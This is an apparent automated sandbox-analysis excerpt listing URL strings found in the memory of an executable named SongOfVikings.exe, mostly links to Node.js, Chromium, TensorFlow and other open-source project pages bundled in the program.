Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/GoogleChromeLabs/text-fragments-polyfill
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/KhronosGroup/SPIRV-Cross
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/KhronosGroup/SPIRV-Headers.git
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/KhronosGroup/SPIRV-Tools.git
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/KhronosGroup/Vulkan-Headers
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/KhronosGroup/Vulkan-Loader
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/RyanZim/universalify#readme
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/RyanZim/universalify.git
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Squirrel/Squirrel.Mac
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/TooTallNate/util-deprecate
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/WICG/scheduling-apis
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/WebAssembly/esm-integration/issues/42
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/WebBluetoothCG/web-bluetooth/blob/main/implementation-status.md
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/aawc/unrar.git
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/addaleax/eventemitter-asyncresource
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ashtuchkin/iconv-lite
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ashtuchkin/iconv-lite/wiki/Javascript-source-file-encodings
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ashtuchkin/iconv-lite/wiki/Node-v4-compatibility
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/ashtuchkin/iconv-lite/wiki/Use-Buffers-when-decoding
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/broofa/node-mime
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/chalk/ansi-regex/blob/HEAD/index.js
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/chalk/supports-color
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/chromium/chromium/blob/HEAD/third_party/blink/public/platform/web_crypto_algorith
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/da-x/rxvt-unicode/tree/v9.22-with-24bit-color
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/facebook/react-native/pull/1632
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/feross/safe-buffer
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/repairES5.js
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/startSES.js
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/closure-compiler/wiki/Source-Maps
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/diff-match-patch/tree/master/javascript
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/distributed_point_functions
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/google-api-cpp-client/
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/ruy
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/ukey2
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/woff2
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/wuffs-mirror-release-c
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/google/xnnpack
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/heycam/webidl/pull/946.
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/iarna/unique-filename
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/iarna/unique-filename.git
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/iarna/wide-align
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/isaacs/color-support.
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/isaacs/minipass.git
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/isaacs/node-tar.git
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/isaacs/yallist.git
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/joyent/node
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/joyent/node/issues/1726
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/joyent/node/issues/3295.
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/juliangruber/brace-expansion
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/libuv/libuv/pull/1501.
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mafintosh/end-of-stream
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mafintosh/pump
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mafintosh/tar-fs
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mafintosh/tar-fs.git
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mafintosh/tar-stream
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mafintosh/tar-stream.git
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mikeal/tunnel-agent
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mysticatea/abort-controller
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node-addon-api
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node-addon-api#collaborators)
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node-addon-api/issues
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node-v0.x-archive/issues/2876.
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/commit/ec2822adaad76b126b5cccdeaa1addf2376c9aa6
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/commit/f7620fb96d339f704932f9bb9a0dceb9952df2d4
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/10673
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/13435
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/19009
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/2006
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/2119
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/3392
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/34532
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/35452
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/35475
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/35862
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/35981
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/39707
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/39758
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/issues/45699
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/12342
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/12607
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/13870#discussion_r124515293
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/1771#issuecomment-119351671
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/21313
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/26334.
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/27791
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/30380#issuecomment-552948364
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/30958
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/32887
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/33515.
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/33661
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/3394
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/34010
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/34103#issuecomment-652002364
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/34375
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/34385
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/35941
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/35949#issuecomment-722496598
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/36061#discussion_r533718029
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/38248
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/38433#issuecomment-828426932
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/38614)
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/43714
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/44952
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/node/pull/46161
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/nodejs/string_decoder
Source: SongOfVikings.exe, 00000000.00000003.1906818857.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/npm/node-semver.git
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/npm/node-tar/blob/51b6627a1f357d2eb433e7378e5f05e83b7aa6cd/lib/header.js#L349
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/npm/node-tar/issues/183
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/npm/node-tar/pull/187
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/npm/ssri
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/npm/wrappy
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/sponsors/sindresorhus
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/standard-things/esm/issues/821.
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tc39/ecma262/blob/HEAD/LICENSE.md
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tc39/ecma262/issues/1209
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tc39/proposal-iterator-helpers/issues/169
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tc39/proposal-ses/blob/e5271cc42a257a05dcae2fd94713ed2f46c08620/shim/src/freeze.j
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tc39/proposal-weakrefs
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/models
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/tensorflow
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/text.git
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/tflite-support
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/gamepad/pull/120
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/gamepad/pull/120Access
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/webappsec-permissions-policy/blob/master/features.md#sensor-features
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/w3c/webappsec-permissions-policy/blob/master/features.md#sensor-featuresDeviceOri
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/wasdk/wasmparser
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/web-animations/web-animations-js
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/westes/flex
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/yetingli
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.freedesktop.org/wayland/weston
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.freedesktop.org/xdg/xdgmime
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.freedesktop.org/xorg/proto/xproto/
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://goo.gl/4NeimX
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://goo.gl/7K7WLu
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://goo.gl/7K7WLuThe
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://goo.gl/7K7WLuWebAudio.AutoplayWebAudio.Autoplay.CrossOriginWebAudio.Autoplay.UnlockType..
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://goo.gl/EuHzyv
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://goo.gl/HxfxSQ
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://goo.gl/J6ASzs
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://goo.gl/t5IS6M).
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google.com/pay
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://google.com/payhttps://android.com/paysecure-payment-confirmationAppStoreBillingPlaceHolderZZ
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#Replaceable
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#define-the-operations
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#dfn-class-string
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#dfn-default-iterator-object
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#dfn-iterator-prototype-object
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#es-interfaces
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#es-iterable
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#es-iterable-entries
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#es-iterators
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#es-namespaces
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#es-operations
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://heycam.github.io/webidl/#es-stringifier
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#ascii-serialisation-of-an-origin
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#concept-origin-opaque
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/canvas.html#concept-canvas-will-read-frequently
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/canvas.html#concept-canvas-will-read-frequentlyOut
